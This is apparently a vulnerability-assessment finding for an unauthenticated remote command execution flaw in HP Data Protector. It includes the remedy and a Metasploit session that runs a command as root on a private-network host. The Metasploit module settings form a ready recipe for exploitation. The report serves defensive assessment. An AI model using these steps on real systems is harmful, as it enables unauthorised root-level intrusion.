53641 (1) - HP Data Protector Remote CommandExecution
Synopsis
The remoteservice allows remote execution of arbitrary commands withoutauthentication.
Description
The remote HPData Protector client or server service is affected by a commandexecution vulnerability. A malicious user can send a speciallycrafted packet that causes this service to execute an arbitrary shellcommand with system privileges.
See Also
http://archives.neohapsis.com/archives/bugtraq/2011-02/0076.html |
Solution
1. Upgrade toData Protector A.06.20 or later and
2. Enable encryptedcontrol communication services on cell server and all clients incell.
Risk Factor
Critical
CVSS Base Score
10.0(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score
8.3(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
References
BID | |
CVE | |
XREF | |
XREF | EDB-ID:17339 |
XREF | EDB-ID:17648 |
XREF | EDB-ID:18521 |
XREF | EDB-ID:27400 |
Exploitable with
CANVAS(true)Metasploit (true)
Plugin Information:
Publicationdate: 2011/05/03, Modification date: 2013/08/08
Hosts
192.168.1.92 (tcp/5555)
Nessus was able to exploit the vulnerability to execute thecommand
'/usr/bin/id' on the remote host, which produced thefollowing output :
------------------------------ snip------------------------------
sdp2
uid=0(root) gid=0(root)egid=3(sys)groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)
sdp2
0
------------------------------snip ------------------------------
Attack Details
msf auxiliary(hp_data_protector_cmd) > show options Module options (auxiliary/admin/hp/hp_data_protector_cmd): Name Current Setting Required Description ---- --------------- -------- ----------- CMD Windows\System32\calc.exe yes File to execute RHOST yes The target address RPORT 5555 yes The target port msf auxiliary(hp_data_protector_cmd) > set CMD /usr/bin/id CMD => /usr/bin/id msf auxiliary(hp_data_protector_cmd) > set RHOST 192.168.1.92 RHOST => 192.168.1.92 msf auxiliary(hp_data_protector_cmd) > run [*] 192.168.1.92:5555 - Sending command... [*] �15 [12:1] ^B[2004] 1409833427 INET sdp2 uid=0(root) gid=0(root) egid=3(sys) groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users) sdp2^F6 0 [*] Auxiliary module execution completed |